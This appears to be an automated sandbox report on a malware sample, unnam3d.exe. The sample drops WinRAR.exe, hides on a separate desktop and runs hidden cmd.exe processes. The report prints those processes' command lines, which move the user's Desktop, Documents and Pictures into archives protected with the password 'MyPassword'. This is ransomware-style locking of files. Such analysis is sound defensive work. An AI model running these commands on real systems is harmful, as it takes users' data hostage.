File Create filename = C:\Users\WhuOXYsD\AppData\Local\Temp\WinRAR.exe, desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\WhuOXYsD\AppData\Local\Temp\WinRAR.exe, type = file_type True 2
Fn
File Write filename = C:\Users\WhuOXYsD\AppData\Local\Temp\WinRAR.exe, size = 2276568 True 1
Fn
User Lookup Privilege privilege = SeDebugPrivilege, luid = 20 True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
System Create Desktop desktop_name = Hbchsbfgcd True 1
Fn
System Switch Desktop desktop_name = Hbchsbfgcd True 1
Fn
Environment Get Environment String name = UKKED False 5
Fn
Process Create process_name = cmd.exe, show_window = SW_HIDE True 1
Fn
Process Create process_name = cmd.exe, show_window = SW_HIDE True 1
Fn
Process Create process_name = cmd.exe, show_window = SW_HIDE True 1
Fn
System Sleep duration = 3000 milliseconds (3.000 seconds) True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
System Sleep duration = 3000 milliseconds (3.000 seconds) True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
System Sleep duration = 3000 milliseconds (3.000 seconds) True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
System Sleep duration = 3000 milliseconds (3.000 seconds) True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
System Sleep duration = 3000 milliseconds (3.000 seconds) True 1
Fn
Thread 0x95c
59 0
Category Operation Information Success Count Logfile
System Get Time type = Ticks, time = 10889088 True 249
Fn
System Get Time type = Ticks, time = 10894361 True 1
Fn
System Sleep duration = 100 milliseconds (0.100 seconds) True 66
Fn
Process #3: cmd.exe
63 0
Information Value
ID #3
File Name c:\windows\syswow64\cmd.exe
Command Line "C:\Windows\System32\cmd.exe" /C cd C:\Users\WhuOXYsD\Desktop && C:\Users\WhuOXYsD\AppData\Local\Temp\\WinRAR.exe m -r -pMyPassword Desktop *
Initial Working Directory C:\Users\WhuOXYsD\Desktop\
Monitor Start Time: 00:00:45, Reason: Child Process
Unmonitor End Time: 00:01:08, Reason: Self Terminated
Monitor Duration 00:00:22
OS Process Information
Information Value
PID 0x8d4
Parent PID 0x948 (c:\users\whuoxysd\appdata\local\temp\unnam3d.exe)
Bitness 32-bit
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username EGLAFTB1N8YA\WhuOXYsD
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x908
Threads
Thread 0x908
63 0
Category Operation Information Success Count Logfile
System Get Time type = System Time, time = 2019-04-02 12:04:15 (UTC) True 1
Fn
System Get Time type = Ticks, time = 10894501 True 1
Fn
System Get Time type = Performance Ctr, time = 12153315597 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\cmd.exe, base_address = 0x4a740000 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x769a0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadUILanguage, address_out = 0x769ca84f True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System False 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 3
Fn
File Open filename = STD_INPUT_HANDLE True 2
Fn
Environment Get Environment String - True 2
Fn
Data
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 0, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE False 1
Module Get Filename process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 True 1
Environment Get Environment String name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 1
Environment Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 1
Environment Get Environment String name = PROMPT False 1
Environment Set Environment String name = PROMPT, value = $P$G True 1
Environment Get Environment String - True 1
Environment Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1
Environment Get Environment String name = KEYS False 1
File Get Info filename = C:\Users\WhuOXYsD\Desktop, type = file_attributes True 2
Environment Set Environment String name = =C:, value = C:\Users\WhuOXYsD\Desktop True 1
Environment Get Environment String - True 1
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x769a0000 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CopyFileExW, address_out = 0x769d3b92 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsDebuggerPresent, address_out = 0x769b4a5d True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x769ca79d True 1
File Get Info filename = C:\Users\WhuOXYsD\Desktop, type = file_attributes True 2
Environment Set Environment String name = =C:, value = C:\Users\WhuOXYsD\Desktop True 1
Environment Get Environment String - True 1
Environment Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 1
Process Create process_name = C:\Users\WhuOXYsD\AppData\Local\Temp\WinRAR.exe, os_pid = 0x340, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL True 1
Environment Set Environment String name = COPYCMD True 1
Environment Get Environment String - True 1
Environment Set Environment String name = =ExitCode, value = 00000000 True 1
Environment Get Environment String - True 1
Environment Set Environment String name = =ExitCodeAscii True 1
Environment Get Environment String - True 1
File Open filename = STD_OUTPUT_HANDLE True 2
File Open filename = STD_INPUT_HANDLE True 1
Process #4: cmd.exe
56 0
Information Value
ID #4
File Name c:\windows\syswow64\cmd.exe
Command Line "C:\Windows\System32\cmd.exe" /C cd C:\Users\WhuOXYsD\Documents && C:\Users\WhuOXYsD\AppData\Local\Temp\\WinRAR.exe m -r -pMyPassword Documents *
Initial Working Directory C:\Users\WhuOXYsD\Desktop\
Monitor Start Time: 00:00:45, Reason: Child Process
Unmonitor End Time: 00:05:23, Reason: Terminated by Timeout
Monitor Duration 00:04:38
OS Process Information
Information Value
PID 0x8dc
Parent PID 0x948 (c:\users\whuoxysd\appdata\local\temp\unnam3d.exe)
Bitness 32-bit
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username EGLAFTB1N8YA\WhuOXYsD
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x20C
Threads
Thread 0x20c
56 0
Category Operation Information Success Count Logfile
System Get Time type = System Time, time = 2019-04-02 12:04:15 (UTC) True 1
System Get Time type = Ticks, time = 10894454 True 1
System Get Time type = Performance Ctr, time = 12149431321 True 1
Module Get Handle module_name = c:\windows\syswow64\cmd.exe, base_address = 0x4a740000 True 1
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x769a0000 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadUILanguage, address_out = 0x769ca84f True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System False 1
File Open filename = STD_OUTPUT_HANDLE True 3
File Open filename = STD_INPUT_HANDLE True 2
Environment Get Environment String - True 2
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 0, type = REG_NONE False 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE False 1
Module Get Filename process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 True 1
Environment Get Environment String name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 1
Environment Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 1
Environment Get Environment String name = PROMPT False 1
Environment Set Environment String name = PROMPT, value = $P$G True 1
Environment Get Environment String - True 1
Environment Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1
Environment Get Environment String name = KEYS False 1
File Get Info filename = C:\Users\WhuOXYsD\Desktop, type = file_attributes True 2
Environment Set Environment String name = =C:, value = C:\Users\WhuOXYsD\Desktop True 1
Environment Get Environment String - True 1
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x769a0000 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CopyFileExW, address_out = 0x769d3b92 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsDebuggerPresent, address_out = 0x769b4a5d True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x769ca79d True 1
File Get Info filename = C:\Users\WhuOXYsD\Documents, type = file_attributes True 2
Environment Set Environment String name = =C:, value = C:\Users\WhuOXYsD\Documents True 1
Environment Get Environment String - True 1
Environment Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 1
Process Create process_name = C:\Users\WhuOXYsD\AppData\Local\Temp\WinRAR.exe, os_pid = 0xa20, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL True 1
Environment Set Environment String name = COPYCMD True 1
Environment Get Environment String - True 1
Process #5: cmd.exe
63 0
Information Value
ID #5
File Name c:\windows\syswow64\cmd.exe
Command Line "C:\Windows\System32\cmd.exe" /C cd C:\Users\WhuOXYsD\Pictures && C:\Users\WhuOXYsD\AppData\Local\Temp\\WinRAR.exe m -r -pMyPassword Pictures *
Initial Working Directory C:\Users\WhuOXYsD\Desktop\
Monitor Start Time: 00:00:45, Reason: Child Process
Unmonitor End Time: 00:01:08, Reason: Self Terminated
Monitor Duration 00:00:22
OS Process Information
Information Value
PID 0x244
Parent PID 0x948 (c:\users\whuoxysd\appdata\local\temp\unnam3d.exe)
Bitness 32-bit
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username EGLAFTB1N8YA\WhuOXYsD
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x950
Threads
Thread 0x950
63 0
Category Operation Information Success Count Logfile
System Get Time type = System Time, time = 2019-04-02 12:04:15 (UTC) True 1
System Get Time type = Ticks, time = 10894532 True 1
System Get Time type = Performance Ctr, time = 12156766839 True 1
Module Get Handle module_name = c:\windows\syswow64\cmd.exe, base_address = 0x4a740000 True 1
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x769a0000 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadUILanguage, address_out = 0x769ca84f True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System False 1
File Open filename = STD_OUTPUT_HANDLE True 3
File Open filename = STD_INPUT_HANDLE True 2
Environment Get Environment String - True 2
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 0, type = REG_NONE False 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE False 1
Module Get Filename process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 True 1
Environment Get Environment String name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 1
Environment Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 1
Environment Get Environment String name = PROMPT False 1
Environment Set Environment String name = PROMPT, value = $P$G True 1
Environment Get Environment String - True 1
Environment Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1
Environment Get Environment String name = KEYS False 1
File Get Info filename = C:\Users\WhuOXYsD\Desktop, type = file_attributes True 2
Environment Set Environment String name = =C:, value = C:\Users\WhuOXYsD\Desktop True 1
Environment Get Environment String - True 1
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x769a0000 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CopyFileExW, address_out = 0x769d3b92 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsDebuggerPresent, address_out = 0x769b4a5d True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x769ca79d True 1
File Get Info filename = C:\Users\WhuOXYsD\Pictures, type = file_attributes True 2
Environment Set Environment String name = =C:, value = C:\Users\WhuOXYsD\Pictures True 1
Environment Get Environment String - True 1
Environment Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 1
Process Create process_name = C:\Users\WhuOXYsD\AppData\Local\Temp\WinRAR.exe, os_pid = 0x6ac, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL True 1
Environment Set Environment String name = COPYCMD True 1
Environment Get Environment String - True 1
Environment Set Environment String name = =ExitCode, value = 00000000 True 1
Environment Get Environment String - True 1
Environment Set Environment String name = =ExitCodeAscii True 1
Environment Get Environment String - True 1
File Open filename = STD_OUTPUT_HANDLE True 2
File Open filename = STD_INPUT_HANDLE True 1
Process #6: winrar.exe
1833 0
Information Value
ID #6
File Name c:\users\whuoxysd\appdata\local\temp\winrar.exe
Command Line C:\Users\WhuOXYsD\AppData\Local\Temp\\WinRAR.exe m -r -pMyPassword Desktop *
Initial Working Directory C:\Users\WhuOXYsD\Desktop\
Monitor Start Time: 00:00:46, Reason: Child Process
Unmonitor End Time: 00:01:08, Reason: Self Terminated
Monitor Duration 00:00:22
OS Process Information
Information Value
PID 0x340
Parent PID 0x8d4 (c:\windows\syswow64\cmd.exe)
Bitness 64-bit
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username EGLAFTB1N8YA\WhuOXYsD
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
Dropped Files
Filename File Size Hash Values YARA Match Actions
Desktop.rar 8.42 MB MD5: f86ba5fef5fef6e7f3328faaa8aac027
SHA1: 9703bf05e525500ddc7680e0c6049eb2c8b28fa2
SHA256: 544bc424404caa14d14ed54e44213ece17bfd68128e93358e17fb52e30d19411
SSDeep: 196608:w8yCznar4brhLNAMf3uR0edxEjMLw60dQNI7hPr1xBG:wJCznarCZiMI5dGMAFlG
False
Threads
Thread 0x6a8
1833 0
Category Operation Information Success Count Logfile
System Get Time type = System Time, time = 2019-04-02 12:04:15 (UTC) True 1
System Get Time type = Performance Ctr, time = 12514842502 True 1
Module Load module_name = api-ms-win-core-synch-l1-2-0, base_address = 0x0 False 1
Module Load module_name = api-ms-win-core-synch-l1-2-0, base_address = 0x7fef7a20000 True 1
Module Get Address module_name = c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll, function = InitializeCriticalSectionEx, address_out = 0x0 False 1
Module Load module_name = api-ms-win-core-fibers-l1-1-1, base_address = 0x0 False 2
Module Load base_address = 0x0 False 1
Module Load module_name = kernel32, base_address = 0x77ae0000 True 1
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = FlsAlloc, address_out = 0x77af7190 True 1
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = FlsSetValue, address_out = 0x77afbd90 True 1
Module Load module_name = api-ms-win-core-synch-l1-2-0, base_address = 0x0 False 1
Module Load module_name = api-ms-win-core-synch-l1-2-0, base_address = 0x7fef7a20000 True 1
Module Get Address module_name = c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll, function = InitializeCriticalSectionEx, address_out = 0x0 False 1
Module Load module_name = api-ms-win-core-fibers-l1-1-1, base_address = 0x0 False 2
Module Load module_name = kernel32, base_address = 0x0 False 1
Module Load module_name = kernel32, base_address = 0x77ae0000 True 1
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = FlsAlloc, address_out = 0x77af7190 True 1
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = FlsGetValue, address_out = 0x77b03520 True 1
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = FlsSetValue, address_out = 0x77afbd90 True 1
File Open filename = STD_INPUT_HANDLE True 1
File Get Info filename = STD_INPUT_HANDLE, type = file_type False 1
File Open filename = STD_OUTPUT_HANDLE True 1
File Get Info filename = STD_OUTPUT_HANDLE, type = file_type False 1
File Open filename = STD_ERROR_HANDLE True 1
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Module Load module_name = api-ms-win-core-localization-l1-2-1, base_address = 0x0 False 2
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = LCMapStringEx, address_out = 0x77b2b710 True 1
Module Get Filename module_name = api-ms-win-core-localization-l1-2-1, process_name = c:\users\whuoxysd\appdata\local\temp\winrar.exe, file_name_orig = C:\Users\WhuOXYsD\AppData\Local\Temp\WinRAR.exe, size = 260 True 1
Environment Get Environment String - True 1
Module Get Handle module_name = c:\windows\system32\kernel32.dll, base_address = 0x77ae0000 True 1
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = InitializeConditionVariable, address_out = 0x77c384f0 True 1
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = SleepConditionVariableCS, address_out = 0x77b2b230 True 1
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = WakeAllConditionVariable, address_out = 0x77c200b0 True 1
System Get Time type = Performance Ctr, time = 12518867803 True 1
Module Get Handle module_name = c:\windows\system32\kernel32.dll, base_address = 0x77ae0000 True 1
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = SetDllDirectoryW, address_out = 0x77b2d8c0 True 1
File Add Search Path - True 1
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = SetDefaultDllDirectories, address_out = 0x0 False 1
Module Get Handle module_name = c:\users\whuoxysd\appdata\local\temp\winrar.exe, base_address = 0x13f160000, flags = GET_MODULE_HANDLE_EX_FLAG_UNCHANGED_REFCOUNT, GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS True 1
Module Get Filename process_name = c:\users\whuoxysd\appdata\local\temp\winrar.exe, file_name_orig = C:\Users\WhuOXYsD\AppData\Local\Temp\WinRAR.exe, size = 2048 True 1
File Get Info filename = C:\Users\WhuOXYsD\AppData\Local\Temp\WinRAR.ini, type = file_attributes False 1
File Get Info filename = \\?\C:\Users\WhuOXYsD\AppData\Local\Temp\WinRAR.ini, type = file_attributes False 1
File Get Info filename = C:\Users\WhuOXYsD\AppData\Roaming\WinRAR, type = file_attributes True 1
File Get Info filename = C:\Users\WhuOXYsD\AppData\Roaming\WinRAR\WinRAR.ini, type = file_attributes False 1
File Get Info filename = \\?\C:\Users\WhuOXYsD\AppData\Roaming\WinRAR\WinRAR.ini, type = file_attributes False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\General False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Paths False 1
File Get Info filename = C:\Users\WhuOXYsD\AppData\Roaming\WinRAR, type = file_attributes True 1
Module Get Filename module_name = api-ms-win-core-localization-l1-2-1, process_name = c:\users\whuoxysd\appdata\local\temp\winrar.exe, file_name_orig = C:\Users\WhuOXYsD\AppData\Local\Temp\WinRAR.exe, size = 2048 True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\General False 1
System Get Info type = Operating System True 1
Module Load module_name = C:\Users\WhuOXYsD\AppData\Local\Temp\rarlng.dll, base_address = 0x0 False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\General False 1
Module Get Filename module_name = C:\Users\WhuOXYsD\AppData\Local\Temp\rarlng.dll, process_name = c:\users\whuoxysd\appdata\local\temp\winrar.exe, file_name_orig = C:\Users\WhuOXYsD\AppData\Local\Temp\WinRAR.exe, size = 2048 True 1
File Create filename = C:\Users\WhuOXYsD\AppData\Local\Temp\winrar.lng, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE False 1
File Create filename = \\?\C:\Users\WhuOXYsD\AppData\Local\Temp\winrar.lng, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE False 1
System Get Info type = System Directory, result_out = C:\Windows\system32 True 1
Module Load module_name = C:\Windows\system32\riched20.dll, base_address = 0x7fef7980000 True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles True 1
System Get Time type = System Time, time = 2019-04-02 12:04:16 (UTC) True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\General False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Paths False 1
File Get Info filename = C:\Users\WhuOXYsD\AppData\Roaming\WinRAR, type = file_attributes True 1
File Create filename = C:\Users\WhuOXYsD\AppData\Roaming\WinRAR\version.dat, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE False 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\General True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\General, value_name = VerInfo, size = 12, type = REG_BINARY True 1
File Create filename = C:\Users\WhuOXYsD\AppData\Roaming\WinRAR\version.dat, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
File Get Info filename = C:\Users\WhuOXYsD\AppData\Roaming\WinRAR\version.dat, type = file_type True 1
File Write filename = C:\Users\WhuOXYsD\AppData\Roaming\WinRAR\version.dat, size = 12 True 1
Mutex Create mutex_name = WinRAR_Busy True 1
Window Find class_name = WinRarWindow True 1
Window Create window_name = WinRAR, class_name = WinRarWindow, wndproc_parameter = 0 True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\WinRAR\Policy False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Policy False 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\WinRAR\Policy False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Policy False 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\WinRAR\Policy False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Policy False 1
System Get Time type = Local Time, time = 2019-04-02 16:04:16 (Local Time) True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Paths False 1
File Get Info filename = C:\Users\WhuOXYsD\AppData\Roaming\WinRAR, type = file_attributes True 1
